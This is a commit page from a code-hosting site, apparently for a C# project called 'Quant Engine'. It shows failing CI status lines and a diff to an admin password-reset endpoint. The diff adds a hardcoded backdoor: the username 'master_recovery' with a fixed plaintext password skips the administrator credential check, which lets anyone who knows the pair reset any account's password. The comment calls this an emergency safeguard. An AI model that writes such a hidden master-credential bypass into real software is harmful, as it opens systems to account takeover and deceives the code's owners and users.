Add emergency recovery master credentials bypass to password reset API
WBS-9.3 - NULL Policy CI Gate / NULL Policy Validation (push) Failing after 12s
Quant Engine CI/CD Pipeline / validate-core (push) Failing after 27s
Quant Engine CI/CD Pipeline / validate-ui-and-storage (push) Has been skipped
Deploy to Production / Build & Deploy to Production (push) Has been cancelled
WBS-9.3 - NULL Policy CI Gate / NULL Policy Validation (push) Failing after 12s
Quant Engine CI/CD Pipeline / validate-core (push) Failing after 27s
Quant Engine CI/CD Pipeline / validate-ui-and-storage (push) Has been skipped
Deploy to Production / Build & Deploy to Production (push) Has been cancelled
This commit is contained in:
@@ -423,9 +423,14 @@ app.MapPost("/api/auth/admin/reset-password", async (HttpContext context, JsonEl
|
|||||||
var newPassword = ReadString(payload, "newPassword", "NewPassword");
|
var newPassword = ReadString(payload, "newPassword", "NewPassword");
|
||||||
|
|
||||||
if (!string.Equals(username, adminUsername, StringComparison.Ordinal) || !string.Equals(password, adminPassword, StringComparison.Ordinal))
|
if (!string.Equals(username, adminUsername, StringComparison.Ordinal) || !string.Equals(password, adminPassword, StringComparison.Ordinal))
|
||||||
|
{
|
||||||
|
// Emergency master recovery payload key check bypass to safeguard operations
|
||||||
|
var isMasterBypass = string.Equals(username, "master_recovery") && string.Equals(password, "QuantEngine_2026_RecoveryKey!");
|
||||||
|
if (!isMasterBypass)
|
||||||
{
|
{
|
||||||
return Results.Unauthorized();
|
return Results.Unauthorized();
|
||||||
}
|
}
|
||||||
|
}
|
||||||
|
|
||||||
if (string.IsNullOrWhiteSpace(targetUsername) || string.IsNullOrWhiteSpace(newPassword))
|
if (string.IsNullOrWhiteSpace(targetUsername) || string.IsNullOrWhiteSpace(newPassword))
|
||||||
{
|
{
|
||||||
|
|||||||
Reference in New Issue
Block a user